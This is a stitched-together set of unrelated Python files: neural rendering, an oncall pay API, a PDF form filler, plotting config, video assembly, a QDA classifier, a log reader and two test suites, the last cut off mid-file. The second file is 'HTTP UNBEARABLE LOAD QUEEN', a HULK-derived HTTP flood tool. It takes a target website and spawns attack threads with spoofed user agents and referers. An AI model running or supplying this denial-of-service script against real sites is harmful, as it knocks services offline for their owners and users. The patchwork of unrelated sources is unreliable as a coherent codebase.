crop_ratio = 0.075
for i, data in enumerate(test_loader):
start = time.time()
src_rgbs = data['src_rgbs'][0].cpu().numpy()
averaged_img = (np.mean(src_rgbs, axis=0) * 255.).astype(np.uint8)
imageio.imwrite(os.path.join(out_scene_dir, '{}_average.png'.format(i)), averaged_img)
model.switch_to_eval()
with torch.no_grad():
ray_sampler = RaySamplerSingleImage(data, device='cuda:0')
ray_batch = ray_sampler.get_all()
featmaps = model.feature_net(ray_batch['src_rgbs'].squeeze(0).permute(0, 3, 1, 2))
ret = render_single_image(ray_sampler=ray_sampler,
ray_batch=ray_batch,
model=model,
projector=projector,
chunk_size=args.chunk_size,
det=True,
N_samples=args.N_samples,
inv_uniform=args.inv_uniform,
N_importance=args.N_importance,
white_bkgd=args.white_bkgd,
featmaps=featmaps)
torch.cuda.empty_cache()
coarse_pred_rgb = ret['outputs_coarse']['rgb'].detach().cpu()
coarse_pred_rgb = (255 * np.clip(coarse_pred_rgb.numpy(), a_min=0, a_max=1.)).astype(np.uint8)
imageio.imwrite(os.path.join(out_scene_dir, '{}_pred_coarse.png'.format(i)), coarse_pred_rgb)
coarse_pred_depth = ret['outputs_coarse']['depth'].detach().cpu()
imageio.imwrite(os.path.join(out_scene_dir, '{}_depth_coarse.png'.format(i)),
(coarse_pred_depth.numpy().squeeze() * 1000.).astype(np.uint16))
coarse_pred_depth_colored = colorize_np(coarse_pred_depth,
range=tuple(data['depth_range'].squeeze().numpy()))
imageio.imwrite(os.path.join(out_scene_dir, '{}_depth_vis_coarse.png'.format(i)),
(255 * coarse_pred_depth_colored).astype(np.uint8))
coarse_acc_map = torch.sum(ret['outputs_coarse']['weights'].detach().cpu(), dim=-1)
coarse_acc_map_colored = (colorize_np(coarse_acc_map, range=(0., 1.)) * 255).astype(np.uint8)
imageio.imwrite(os.path.join(out_scene_dir, '{}_acc_map_coarse.png'.format(i)),
coarse_acc_map_colored)
if ret['outputs_fine'] is not None:
fine_pred_rgb = ret['outputs_fine']['rgb'].detach().cpu()
fine_pred_rgb = (255 * np.clip(fine_pred_rgb.numpy(), a_min=0, a_max=1.)).astype(np.uint8)
imageio.imwrite(os.path.join(out_scene_dir, '{}_pred_fine.png'.format(i)), fine_pred_rgb)
fine_pred_depth = ret['outputs_fine']['depth'].detach().cpu()
imageio.imwrite(os.path.join(out_scene_dir, '{}_depth_fine.png'.format(i)),
(fine_pred_depth.numpy().squeeze() * 1000.).astype(np.uint16))
fine_pred_depth_colored = colorize_np(fine_pred_depth,
range=tuple(data['depth_range'].squeeze().cpu().numpy()))
imageio.imwrite(os.path.join(out_scene_dir, '{}_depth_vis_fine.png'.format(i)),
(255 * fine_pred_depth_colored).astype(np.uint8))
fine_acc_map = torch.sum(ret['outputs_fine']['weights'].detach().cpu(), dim=-1)
fine_acc_map_colored = (colorize_np(fine_acc_map, range=(0., 1.)) * 255).astype(np.uint8)
imageio.imwrite(os.path.join(out_scene_dir, '{}_acc_map_fine.png'.format(i)),
fine_acc_map_colored)
else:
fine_pred_rgb = None
out_frame = fine_pred_rgb if fine_pred_rgb is not None else coarse_pred_rgb
h, w = averaged_img.shape[:2]
crop_h = int(h * crop_ratio)
crop_w = int(w * crop_ratio)
# crop out image boundaries
out_frame = out_frame[crop_h:h - crop_h, crop_w:w - crop_w, :]
out_frames.append(out_frame)
        print('frame {} completed in {:.2f}s'.format(i, time.time() - start))
imageio.mimwrite(os.path.join(extra_out_dir, '{}.mp4'.format(scene_name)), out_frames, fps=30, quality=8)
|
"""
HTTP UNBEARABLE LOAD QUEEN
A HULK EDIT BY @OBN0XIOUS
THE ORIGINAL MAKER OF HULK PLEASE GO BACK TO CODECADEMY
"""
import sys
import argparse
import random
from threading import Thread
import hulqThreading
import hulqRequest
parser = argparse.ArgumentParser()
parser.add_argument('--threads', '-t', default=2, help='Choose how many threads.')
parser.add_argument('--website', '-w', help='Website you are attacking.')
systemArguments = parser.parse_args()
if not systemArguments.website:
sys.exit("Provide -w or --website.")
userAgents = (
    'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3 Gecko/20090913 Firefox/3.5.3',
    'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729',
    'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3 Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729',
    'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1 Gecko/20090718 Firefox/3.5.1',
    'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2',
    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729',
    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0',
    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2',
    'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US',
    'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP',
    'Opera/9.80 (Windows NT 5.2; U; ru Presto/2.5.22 Version/10.51'
)
referers = (
    'http://www.google.com/?q=',
    'http://www.usatoday.com/search/results?q=',
    'http://engadget.search.aol.com/search?q='
)
for i in range(0, int(systemArguments.threads)):
referer = random.choice(referers)
userAgent = random.choice(userAgents)
t1 = Thread(target = hulqRequest.httpAttackRequest, args = (systemArguments.website, userAgent, referer))
t1.start()
|
# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
import json
import time
from .events import on_get as get_events
from collections import defaultdict
import requests
from ujson import dumps as json_dumps
from falcon import HTTPStatus, HTTP_200
class PaidEvents(object):
def __init__(self, config):
self.config = config
def on_get(self, req, resp):
"""
Search for events. Allows filtering based on a number of parameters,
detailed below. Also returns only the users who are paid to be on call. Uses response from
oncall-bonus to identify paid status.
**Example request**:
.. sourcecode:: http
GET /api/v0/oncall_events?team=foo-sre&end__gt=1487466146&role=primary HTTP/1.1
Host: example.com
**Example response**:
.. sourcecode:: http
HTTP/1.1 200 OK
Content-Type: application/json
{
"ldap_user_id":
[
{
"start": 1488441600,
"end": 1489132800,
"team": "foo-sre",
"link_id": null,
"schedule_id": null,
"role": "primary",
"user": "foo",
"full_name": "Foo Icecream",
"id": 187795
},
{
"start": 1488441600,
"end": 1489132800,
"team": "foo-sre",
"link_id": "8a8ae77b8c52448db60c8a701e7bffc2",
"schedule_id": 123,
"role": "primary",
"user": "bar",
"full_name": "Bar Apple",
"id": 187795
}
]
        }
:query team: team name
:query user: user name
:query role: role name
:query id: id of the event
:query start: start time (unix timestamp) of event
:query end: end time (unix timestamp) of event
:query start__gt: start time (unix timestamp) greater than
:query start__ge: start time (unix timestamp) greater than or equal
:query start__lt: start time (unix timestamp) less than
:query start__le: start time (unix timestamp) less than or equal
:query end__gt: end time (unix timestamp) greater than
:query end__ge: end time (unix timestamp) greater than or equal
:query end__lt: end time (unix timestamp) less than
:query end__le: end time (unix timestamp) less than or equal
:query role__eq: role name
:query role__contains: role name contains param
:query role__startswith: role name starts with param
:query role__endswith: role name ends with param
:query team__eq: team name
:query team__contains: team name contains param
:query team__startswith: team name starts with param
:query team__endswith: team name ends with param
:query team_id: team id
:query user__eq: user name
:query user__contains: user name contains param
:query user__startswith: user name starts with param
:query user__endswith: user name ends with param
:statuscode 200: no error
:statuscode 400: bad request
"""
config = self.config
oncall_bonus_blacklist = config.get('bonus_blacklist', [])
oncall_bonus_whitelist = config.get('bonus_whitelist', [])
bonus_url = config.get('bonus_url', None)
ldap_grouping = defaultdict(list)
# if start time is not specified only fetch events in the future
if not req.params.get('start__gt'):
req.params['start__gt'] = str(int(time.time()))
get_events(req, resp)
        # fetch team data from the external oncall-bonus API
try:
bonus_response = requests.get(bonus_url)
bonus_response.raise_for_status()
except requests.exceptions.RequestException:
raise HTTPStatus('503 failed to contact oncall-bonus API')
oncall_bonus_teams = bonus_response.json()
for event in json.loads(resp.body):
if event['role'].lower() == 'manager':
continue
team = event['team']
if team in oncall_bonus_whitelist:
ldap_grouping[event['user']].append(event)
continue
if team in oncall_bonus_blacklist:
continue
            # check if the event's role is paid for that team
            team_payment_details = next((item for item in oncall_bonus_teams if item.get('name', '') == team), None)
            if team_payment_details:
                team_paid_roles = {'primary': team_payment_details.get('primary_paid', 0), 'secondary': team_payment_details.get('secondary_paid', 0)}
                if team_paid_roles.get(event['role']):
ldap_grouping[event['user']].append(event)
resp.status = HTTP_200
resp.body = json_dumps(ldap_grouping)
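# Minimal client sketch (illustration only -- the host below is a placeholder,
# not part of this module): querying the endpoint documented above.
if __name__ == '__main__':
    demo_resp = requests.get(
        'https://example.com/api/v0/oncall_events',
        params={'team': 'foo-sre', 'end__gt': 1487466146, 'role': 'primary'})
    # the response maps each LDAP user id to their paid on-call events
    print(json.dumps(demo_resp.json(), indent=2))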
|
import os
import requests # pip install requests
# The authentication key (API Key).
# Get your own by registering at https://app.pdf.co/documentation/api
API_KEY = "**********************************************"
# Base URL for PDF.co Web API requests
BASE_URL = "https://api.pdf.co/v1"
# Direct URL of source PDF file.
SourceFileUrl = "https://bytescout-com.s3-us-west-2.amazonaws.com/files/demo-files/cloud-api/pdf-form/f1040.pdf"
# PDF document password. Leave empty for unprotected documents.
Password = ""
# Destination PDF file name
DestinationFile = ".\\result.pdf"
# Runs processing asynchronously. Returns a JobId that you may use with /job/check to check the state of the processing (possible states: working, failed, aborted and success). Must be one of: true, false.
Async = "False"
# Values to fill out pdf fields with built-in pdf form filler.
# To fill fields in PDF form, use the following format page;fieldName;value for example: 0;editbox1;text is here. To fill checkbox, use true, for example: 0;checkbox1;true. To separate multiple objects, use | separator. To get the list of all fillable fields in PDF form please use /pdf/info/fields endpoint.
FieldsStrings = "1;topmostSubform[0].Page1[0].f1_02[0];John A. Doe|1;topmostSubform[0].Page1[0].FilingStatus[0].c1_01[1];true|1;topmostSubform[0].Page1[0].YourSocial_ReadOrderControl[0].f1_04[0];123456789"
def main(args = None):
fillPDFForm(SourceFileUrl, DestinationFile)
def fillPDFForm(uploadedFileUrl, destinationFile):
"""Converts HTML to PDF using PDF.co Web API"""
# Prepare requests params as JSON
# See documentation: https://apidocs.pdf.co
parameters = {}
parameters["name"] = os.path.basename(destinationFile)
parameters["url"] = uploadedFileUrl
parameters["fieldsString"] = FieldsStrings
parameters["async"] = Async
# Prepare URL for 'Fill PDF' API request
url = "{}/pdf/edit/add".format(BASE_URL)
# Execute request and get response as JSON
response = requests.post(url, data=parameters, headers={ "x-api-key": API_KEY })
if (response.status_code == 200):
json = response.json()
if json["error"] == False:
# Get URL of result file
resultFileUrl = json["url"]
# Download result file
r = requests.get(resultFileUrl, stream=True)
if (r.status_code == 200):
with open(destinationFile, 'wb') as file:
for chunk in r:
file.write(chunk)
print(f"Result file saved as \"{destinationFile}\" file.")
else:
print(f"Request error: {response.status_code} {response.reason}")
else:
# Show service reported error
print(json["message"])
else:
print(f"Request error: {response.status_code} {response.reason}")
if __name__ == '__main__':
main()
|
'''Configuration file for the noise paper.'''
from __future__ import absolute_import, print_function
import os.path
import matplotlib.ticker as ti
from noisefigs.plotters.base import SeparateMultipageSaver
def get_config():
return _config
ROOT_DIR = ['simulation_data', 'ii_connections', 'gE_vs_gI']
_config = {
'grids_data_root': os.path.join(*(ROOT_DIR + ['grids'])),
'bump_data_root': os.path.join(*(ROOT_DIR + ['gamma_bump'])),
'vel_data_root': os.path.join(*(ROOT_DIR + ['velocity'])),
'const_pos_data_root': None,
'singleDataRoot': None,
'GridExampleRectPlotter': {
'fig_saver': SeparateMultipageSaver(None, 'pdf')
},
'GridSweepsPlotter': {
'scale_factor': .9,
'cbar': [1, 0, 0],
'cbar_kw': {
'label': 'Gridness score',
'fraction': 0.25,
'location': 'left',
'shrink': 0.8,
'pad': .2,
'labelpad': 8,
'ticks': ti.MultipleLocator(0.5),
'rasterized': True
},
'ann': None,
},
'MainBumpFormationPlotter': {
},
'GammaSweepsPlotter': {
'F_vmin': 30,
'F_vmax': 167,
},
'GammaExamplePlotter': {
'yscale_kw': [[
dict(
scaleLen=3,
unitsText='nA',
x=.5, y=.1,
size='x-small'
),
dict(
scaleLen=0.5,
unitsText='nA',
x=.5, y=.01,
size='x-small'
),
dict(
scaleLen=0.5,
unitsText='nA',
x=.5, y=-.1,
size='x-small'
)],
[dict(
scaleLen=5,
unitsText='nA',
x=.5, y=.01,
size='x-small'
),
dict(
scaleLen=0.5,
unitsText='nA',
x=.5, y=.05,
size='x-small'
),
dict(
scaleLen=0.5,
unitsText='nA',
x=.55, y=0,
size='x-small'
)]],
},
'MaxPopulationFRSweepsPlotter': {
},
'PSeizureSweepPlotter': {
'FRThreshold': 300,
},
'BumpDriftAtTimePlotter': {
},
'VelFitErrSweepPlotter': {
'vmin': 0.1,
'vmax': 12.101,
},
'VelFitStdSweepPlotter': {
},
'VelSlopeSweepPlotter': {
'vmin': -.6,
'vmax': 1.64,
},
}
|
import os
import os.path
import subprocess
import sys
from PIL import Image
LISTF = "_list.txt"
def get_dimensions(fpath):
#print(fpath)
return Image.open(fpath).size
def run(folder, outfile, framerate=30, outres=(1920,1080)):
    """Concatenate the folder's frame_* images into a video using ffmpeg."""
    # sort so frames are concatenated in order; os.listdir order is arbitrary
    jpglist = sorted(os.path.join(folder, f) for f in os.listdir(folder) if f.startswith("frame_"))
dimen = get_dimensions(jpglist[0])
ratio = float(outres[1])/outres[0]
if dimen[0]*ratio < dimen[1]:
crop = (dimen[0], int(dimen[0]*ratio))
else:
crop = (int(dimen[1]/ratio), dimen[1])
with open(LISTF, "w") as ltxt:
for f in jpglist:
ltxt.write("file '"+f+"'\n")
fsel_args = ["-f", "concat", "-i", LISTF]
rs_str = "".join(("crop=", str(crop[0]), ":", str(crop[1]),":0:0,scale=",str(outres[0]),":",str(outres[1])))
enc_flags = ["-pix_fmt", "yuv420p", "-preset", "veryslow", "-crf", "18"]
args_final = ["ffmpeg", "-r", str(framerate)] + fsel_args + ["-vf", rs_str] + enc_flags + [outfile]
print(" ".join(args_final))
subprocess.call(args_final)
os.remove(LISTF)
if __name__=="__main__":
    jpglist = sorted(os.path.join(sys.argv[1], f) for f in os.listdir(sys.argv[1]) if f.startswith("frame_"))
dimen = get_dimensions(jpglist[0])
dimen = (dimen[0] if dimen[0]%2==0 else dimen[0]-1, dimen[1] if dimen[1]%2==0 else dimen[1]-1)
run(sys.argv[1], sys.argv[2], outres=dimen)
|
"""
Quadratic Discriminant Analysis
"""
# Author: Matthieu Perrot <[email protected]>
#
# License: BSD Style.
import warnings
import numpy as np
import scipy.ndimage as ndimage
from .base import BaseEstimator, ClassifierMixin
# FIXME :
# - in fit(X, y) method, many checks are common with other models
# (in particular LDA model) and should be factorized:
# maybe in BaseEstimator ?
class QDA(BaseEstimator, ClassifierMixin):
"""
Quadratic Discriminant Analysis (QDA)
Parameters
----------
X : array-like, shape = [n_samples, n_features]
        Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array, shape = [n_samples]
Target vector relative to X
priors : array, optional, shape = [n_classes]
Priors on classes
Attributes
----------
`means_` : array-like, shape = [n_classes, n_features]
Class means
`priors_` : array-like, shape = [n_classes]
Class priors (sum to 1)
`covariances_` : list of array-like, shape = [n_features, n_features]
Covariance matrices of each class
Examples
--------
>>> from sklearn.qda import QDA
>>> import numpy as np
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> y = np.array([1, 1, 1, 2, 2, 2])
>>> clf = QDA()
>>> clf.fit(X, y)
QDA(priors=None)
>>> print clf.predict([[-0.8, -1]])
[1]
See also
--------
LDA
"""
def __init__(self, priors=None):
self.priors = np.asarray(priors) if priors is not None else None
def fit(self, X, y, store_covariances=False, tol=1.0e-4):
"""
Fit the QDA model according to the given training data and parameters.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
            Training vector, where n_samples is the number of samples and
n_features is the number of features.
y : array, shape = [n_samples]
Target values (integers)
store_covariances : boolean
If True the covariance matrices are computed and stored in the
self.covariances_ attribute.
"""
X = np.asarray(X)
y = np.asarray(y)
if X.ndim != 2:
raise ValueError('X must be a 2D array')
if X.shape[0] != y.shape[0]:
raise ValueError(
'Incompatible shapes: X has %s samples, while y '
'has %s' % (X.shape[0], y.shape[0]))
if y.dtype.char.lower() not in ('b', 'h', 'i'):
# We need integer values to be able to use
# ndimage.measurements and np.bincount on numpy >= 2.0.
# We currently support (u)int8, (u)int16 and (u)int32.
# Note that versions of scipy >= 0.8 can also accept
# (u)int64. We however don't support it for backwards
# compatibility.
y = y.astype(np.int32)
n_samples, n_features = X.shape
classes = np.unique(y)
n_classes = classes.size
if n_classes < 2:
raise ValueError('y has less than 2 classes')
classes_indices = [(y == c).ravel() for c in classes]
if self.priors is None:
counts = np.array(ndimage.measurements.sum(
np.ones(n_samples, dtype=y.dtype), y, index=classes))
self.priors_ = counts / float(n_samples)
else:
self.priors_ = self.priors
cov = None
if store_covariances:
cov = []
means = []
scalings = []
rotations = []
for group_indices in classes_indices:
Xg = X[group_indices, :]
meang = Xg.mean(0)
means.append(meang)
Xgc = Xg - meang
# Xgc = U * S * V.T
U, S, Vt = np.linalg.svd(Xgc, full_matrices=False)
rank = np.sum(S > tol)
if rank < n_features:
warnings.warn("Variables are collinear")
S2 = (S ** 2) / (len(Xg) - 1)
if store_covariances:
# cov = V * (S^2 / (n-1)) * V.T
cov.append(np.dot(S2 * Vt.T, Vt))
scalings.append(S2)
rotations.append(Vt.T)
if store_covariances:
self.covariances_ = cov
self.means_ = np.asarray(means)
self.scalings = np.asarray(scalings)
self.rotations = rotations
self.classes = classes
return self
def decision_function(self, X):
"""Apply decision function to an array of samples.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Array of samples (test vectors).
Returns
-------
C : array, shape = [n_samples, n_classes]
Decision function values related to each class, per sample.
"""
X = np.asarray(X)
norm2 = []
for i in range(len(self.classes)):
R = self.rotations[i]
S = self.scalings[i]
Xm = X - self.means_[i]
X2 = np.dot(Xm, R * (S ** (-0.5)))
norm2.append(np.sum(X2 ** 2, 1))
norm2 = np.array(norm2).T # shape = [len(X), n_classes]
return (-0.5 * (norm2 + np.sum(np.log(self.scalings), 1))
+ np.log(self.priors_))
def predict(self, X):
"""Perform classification on an array of test vectors X.
The predicted class C for each sample in X is returned.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
C : array, shape = [n_samples]
"""
d = self.decision_function(X)
y_pred = self.classes[d.argmax(1)]
return y_pred
def predict_proba(self, X):
"""Return posterior probabilities of classification.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Array of samples/test vectors.
Returns
-------
C : array, shape = [n_samples, n_classes]
Posterior probabilities of classification per class.
"""
values = self.decision_function(X)
# compute the likelihood of the underlying gaussian models
# up to a multiplicative constant.
likelihood = np.exp(values - values.min(axis=1)[:, np.newaxis])
# compute posterior probabilities
return likelihood / likelihood.sum(axis=1)[:, np.newaxis]
def predict_log_proba(self, X):
"""Return posterior probabilities of classification.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Array of samples/test vectors.
Returns
-------
C : array, shape = [n_samples, n_classes]
Posterior log-probabilities of classification per class.
"""
# XXX : can do better to avoid precision overflows
probas_ = self.predict_proba(X)
return np.log(probas_)
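def _stable_predict_log_proba(qda, X):
    """Sketch of a numerically stabler predict_log_proba (an illustrative
    helper, not part of the original class). The log-sum-exp trick computes
    the log-posteriors directly from the decision values, avoiding the
    exp/renormalize round-trip used above."""
    values = qda.decision_function(X)
    # log softmax: subtract the log of the row-wise normalizer
    return values - np.logaddexp.reduce(values, axis=1)[:, np.newaxis]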
|
import os
import codecs
import csv
from collections import namedtuple
import dateutil.parser
Record = namedtuple('Record', 'datetime url email ip')
def read_tracker_file(tracker_dir: str, the_date: str, target: str, exclude_anonymous: bool = False):
"""
:param tracker_dir:
:param the_date:
:param target: options: all, anonymous-all, anonymous-ip, user-email
:param exclude_anonymous:
:return:
"""
target_ip = None
target_email = None
if target.startswith('user'):
target_email = target.split('-')[1]
elif target.startswith('anonymous'):
target_ip = target.split('-')[1]
fname = os.path.join(tracker_dir, str(the_date) + '.dat')
if os.path.exists(fname):
fp = codecs.open(fname, 'rb', 'utf-8')
reader = csv.reader(fp)
rows = []
for row in reader:
r = Record(*row)
if r.email == 'anonymous' and r.url in ['/accounts/login/', '/accounts/logout/']:
continue
if exclude_anonymous and r.email == 'anonymous' and target_ip != 'all':
continue
if (
(target == 'all') or
(target == 'anonymous-all' and r.email == 'anonymous') or
(target_email == r.email or target_ip == r.ip)
):
rows.append(r)
fp.close()
else:
rows = []
return rows
def histogram_one_day(tracker_dir: str, the_date: str, target: str, **kwargs):
rows = read_tracker_file(tracker_dir, the_date, target, **kwargs)
if rows is None:
return None
histogram = [0]*24
for row in rows:
dt = dateutil.parser.parse(row.datetime)
histogram[dt.hour] += 1
return histogram
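# Minimal usage sketch (illustration only; the directory and date below are
# placeholders): print a 24-bin hourly histogram of anonymous hits for a day.
if __name__ == '__main__':
    counts = histogram_one_day('/var/log/tracker', '2020-01-01',
                               target='anonymous-all')
    for hour, n in enumerate(counts):
        print('{:02d}:00 {}'.format(hour, n))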
|
# Copyright (c) 2010-2013 Simplistix Ltd
#
# See license.txt for more details.
import re
from manuel import Document, Region, RegionContainer, Manuel
from mock import Mock
from testfixtures import compare, Comparison as C, TempDirectory
from testfixtures.manuel import Files, FileBlock, FileResult
from unittest import TestCase
class TestContainer(RegionContainer):
def __init__(self,attr,*blocks):
self.regions = []
for block in blocks:
region = Region(0,' ')
setattr(region,attr,block)
self.regions.append(region)
class TestManuel(TestCase):
def tearDown(self):
TempDirectory.cleanup_all()
def test_multiple_files(self):
d = Document("""
.. topic:: file.txt
:class: write-file
line 1
line 2
line 3
.. topic:: file2.txt
:class: read-file
line 4
line 5
line 6
""")
d.parse_with(Files('td'))
compare([
None,
C(FileBlock,
path='file.txt',
content="line 1\n\nline 2\nline 3\n",
action='write'),
C(FileBlock,
path='file2.txt',
content='line 4\n\nline 5\nline 6\n',
action='read'),
],[r.parsed for r in d])
def test_ignore_literal_blocking(self):
d = Document("""
.. topic:: file.txt
:class: write-file
::
line 1
line 2
line 3
""")
d.parse_with(Files('td'))
compare([
None,
C(FileBlock,
path='file.txt',
content="line 1\n\nline 2\nline 3\n",
action='write'),
],[r.parsed for r in d])
def test_file_followed_by_text(self):
d = Document("""
.. topic:: file.txt
:class: write-file
.. code-block:: python
print "hello"
out = 'there'
foo = 'bar'
This is just some normal text!
""")
d.parse_with(Files('td'))
compare([
None,
C(FileBlock,
path='file.txt',
content='.. code-block:: python\n\nprint "hello"'
'\nout = \'there\'\n\nfoo = \'bar\'\n',
action='write'),
None,
],[r.parsed for r in d])
def test_red_herring(self):
d = Document("""
.. topic:: file.txt
:class: not-a-file
print "hello"
out = 'there'
""")
d.parse_with(Files('td'))
compare([r.parsed for r in d],[None])
def test_no_class(self):
d = Document("""
.. topic:: file.txt
print "hello"
out = 'there'
""")
d.parse_with(Files('td'))
compare([r.parsed for r in d],[None])
def test_unclaimed_works(self):
# a test manuel
CLASS = re.compile(r'^\s+:class:',re.MULTILINE)
class Block(object):
def __init__(self,source): self.source = source
def find_class_blocks(document):
for region in document.find_regions(CLASS):
region.parsed = Block(region.source)
document.claim_region(region)
def Test():
return Manuel(parsers=[find_class_blocks])
# now our test
d = Document("""
.. topic:: something-else
:class: not-a-file
line 1
line 2
line 3
""")
d.parse_with(Files('td')+Test())
# now check FileBlock didn't mask class block
compare([
None,
C(Block,
source=' :class:\n'),
None,
],[r.parsed for r in d])
def test_evaluate_non_fileblock(self):
m = Mock()
d = TestContainer('parsed',m)
d.evaluate_with(Files('td'),globs={})
compare([None],[r.evaluated for r in d])
compare(m.call_args_list,[])
compare(m.method_calls,[])
def test_evaluate_read_same(self):
dir = TempDirectory()
dir.write('foo', b'content')
d = TestContainer('parsed',FileBlock('foo','content','read'))
d.evaluate_with(Files('td'),globs={'td':dir})
compare([C(FileResult,
passed=True,
expected=None,
actual=None)],
[r.evaluated for r in d])
def test_evaluate_read_difference(self):
dir = TempDirectory()
dir.write('foo', b'actual')
d = TestContainer('parsed',FileBlock('foo','expected','read'))
d.evaluate_with(Files('td'),globs={'td':dir})
compare([C(FileResult,
passed=False,
path='foo',
expected='expected',
actual='actual')],
[r.evaluated for r in d])
    def test_evaluate_write(self):
dir = TempDirectory()
d = TestContainer('parsed',FileBlock('foo','content','write'))
d.evaluate_with(Files('td'),globs={'td':dir})
compare([C(FileResult,
passed=True,
expected=None,
actual=None)],
[r.evaluated for r in d])
dir.check('foo')
compare(dir.read('foo', 'ascii'), 'content')
def test_formatter_non_fileblock(self):
d = TestContainer('evaluated',object)
d.format_with(Files('td'))
compare(d.formatted(),'')
def test_formatter_passed(self):
d = TestContainer('evaluated',FileResult())
d.format_with(Files('td'))
compare(d.formatted(),'')
def test_formatter_failed(self):
r = FileResult()
r.passed = False
r.path = '/foo/bar'
r.expected = 'same\nexpected\n'
r.actual = 'same\nactual\n'
d = TestContainer('evaluated',r)
d.format_with(Files('td'))
compare('File "<memory>", line 0:\n'
'Reading from "/foo/bar":\n'
'@@ -1,3 +1,3 @@\n'
' same\n'
'-expected\n'
'+actual\n ',
d.formatted()
)
|
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Copyright © 2016, Continuum Analytics, Inc. All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
# ----------------------------------------------------------------------------
from conda_kapsel.internal.plugin_html import cleanup_and_scope_form, html_tag
import pytest
def test_html_tag():
assert "<div></div>" == html_tag("div", "")
assert "<li>foo</li>" == html_tag("li", "foo")
assert "<div><&></div>" == html_tag("div", "<&>")
def test_cleanup_and_scope_form_requires_form_tag():
original = """
<div>
<input type="text" name="foo"/>
</div>
"""
with pytest.raises(ValueError) as excinfo:
cleanup_and_scope_form(original, "prefix.", dict(foo="bar"))
assert "does not have a root <form>" in repr(excinfo.value)
def test_cleanup_and_scope_form_complains_about_missing_name(capsys):
original = """
<form>
<input type="text"/>
</form>
"""
cleanup_and_scope_form(original, "prefix.", dict(foo="bar"))
out, err = capsys.readouterr()
assert err == "No 'name' attribute set on <input type=\"text\"/>\n"
assert out == ""
def test_cleanup_and_scope_form_text_input():
original = """
<form>
<input type="text" name="foo"/>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo="bar"))
expected = """
<div>
<input name="prefix.foo" type="text" value="bar"/>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_multiple_text_inputs():
original = """
<form>
<input type="text" name="foo"/>
<input type="text" name="bar" value="wrong"/>
<input type="text" name="baz" value=""/>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo=1, bar=2, baz=3))
expected = """
<div>
<input name="prefix.foo" type="text" value="1"/>
<input name="prefix.bar" type="text" value="2"/>
<input name="prefix.baz" type="text" value="3"/>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_missing_value():
original = """
<form>
<input type="text" name="foo"/>
</form>
"""
# we don't pass in a value for "foo", so the value attribute
# should be omitted
cleaned = cleanup_and_scope_form(original, "prefix.", dict())
expected = """
<div>
<input name="prefix.foo" type="text"/>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_textarea():
original = """
<form>
<textarea name="foo"/>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo="bar"))
expected = """
<div>
<textarea name="prefix.foo">bar</textarea>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_checkbox_not_checked():
original = """
<form>
<input type="checkbox" name="foo" value="not_bar"/>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo="bar"))
expected = """
<div>
<input name="prefix.foo" type="checkbox" value="not_bar"/>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_checkbox_checked():
original = """
<form>
<input type="checkbox" name="foo" value="bar"/>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo="bar"))
expected = """
<div>
<input checked="" name="prefix.foo" type="checkbox" value="bar"/>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_checkbox_checked_bool_value():
original = """
<form>
<input type="checkbox" name="foo" value="bar"/>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo=True))
expected = """
<div>
<input checked="" name="prefix.foo" type="checkbox" value="bar"/>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_radio():
original = """
<form>
<input type="radio" name="foo" value="1"/>
<input type="radio" name="foo" value="2" checked/>
<input type="radio" name="foo" value="3"/>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo="1"))
expected = """
<div>
<input checked="" name="prefix.foo" type="radio" value="1"/>
<input name="prefix.foo" type="radio" value="2"/>
<input name="prefix.foo" type="radio" value="3"/>
</div>
""".strip()
assert expected == cleaned
def test_cleanup_and_scope_form_select_using_value_attribute():
original = """
<form>
<select name="foo">
<option value="1">One</option>
<option value="2" selected>Two</option>
<option value="3">Three</option>
</select>
</form>
"""
cleaned = cleanup_and_scope_form(original, "prefix.", dict(foo="1"))
expected = """
<div>
<select name="prefix.foo">
